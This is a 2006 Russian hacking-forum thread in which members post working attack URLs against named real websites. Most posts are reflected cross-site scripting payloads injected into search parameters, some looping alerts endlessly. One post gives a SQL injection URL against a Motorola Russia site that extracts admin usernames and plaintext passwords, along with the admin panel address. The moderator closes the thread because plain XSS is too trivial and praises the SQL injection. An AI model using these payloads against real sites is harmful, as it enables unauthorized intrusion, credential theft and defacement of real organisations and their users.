Баги на сайтах.

Discussion in 'Уязвимости' started by D1mOn, 28 Jan 2006.

Thread Status:
Not open for further replies.
  1. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    На таком знаменитом сайте такие знаменитые баги :)

    _http://rusdoc.kulichki.ru/public/search.shtml?searWords="><script>alert()</script>
     
  2. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    Мне очень понравился этот баг:
    _http://www.sprandi.ru/search?q="><script>alert()</script>


    XSS Rulezzz!!!
     
  3. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    http://www.rupoisk.ru/index.php?search_string=%27%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
     
  4. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    _http://www.mediexpo.ru/search/?q="><script>alert()</script>
     
  5. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    _http://magnolia-tv.com/search/?target=news&search="><script>alert()</script>
     
  6. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    На:
    _http://ncagip.ru/search?needle="><script>while(1){alert();}</script>
     
  7. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    зачем?




    _http://www.volgatelecom.kirov.ru/search/?q="><script>while(1){alert();}</script>
     
  8. fjuDao

    fjuDao Member

    Joined:
    27 May 2006
    Messages:
    3
    Likes Received:
    7
    Reputations:
    5
    Motorola RU - неожидал

    _http://www.motorola.ru/pcomm.php?id=33&action=hole&newsid=3122666+UNION+SELECT+0,0,0,name,password,0,0,0,0,0,0,0,0,0,0+FROM+users/*

    логин и пароль(в чистом виде) к админке:

    _http://www.motorola.ru/admin/

    :)
     
    5 people like this.
  9. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    да, но:
    safe_mode: ON PHP version: 4.3.11 cURL: OFF MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
    Disable functions : dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit
     
  10. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
  11. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
  12. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    красивый дизайн у сайтов! =)

    _http://www.cenmax.ru/search.html?q='><script>alert(/kaban/)</script>

    _http://oriole.ru/search.html?q='><script>alert(/kaban/)</script>

    _http://sentry.ru/search.html?q='><script>alert(/kaban/)</script>

    _http://inspector-alarm.ru/search.html?q='><script>alert(/kaban/)</script>
     
  13. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    _http://www.military-loan-savvy.com/military-personal-loans.html?source=yahoo&campaign - алерт в поисковике


    _http://usmcshop.grunt.com/Grunt/ в поисковике алерт
     
  14. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    _http://www.stepbystep.com.ua/rus/search/?query="><script>alert()</script>
     
  15. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Короче учитывая мнения многих юзеров, временно закрываю темку, до тех пор пока с модерами не обсудим.Многие правы, нефиг стоко пассив хсс выкладывать, вот чел выложил баг на мотороле, респект ему.
    2dracula: а ты заипал со своими хсс-ками пассивными + каждый в отдельном посте...
    ТЕМА ЗАКРЫТА ВРЕМЕННО.
     
    1 person likes this.
  16. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Согласен довно хотел тоже сказать, эти ксс вообше сидят в горле, нужна обсудить и сделать так что бы были реальные баги , а не пасивные ксс.
     
Thread Status:
Not open for further replies.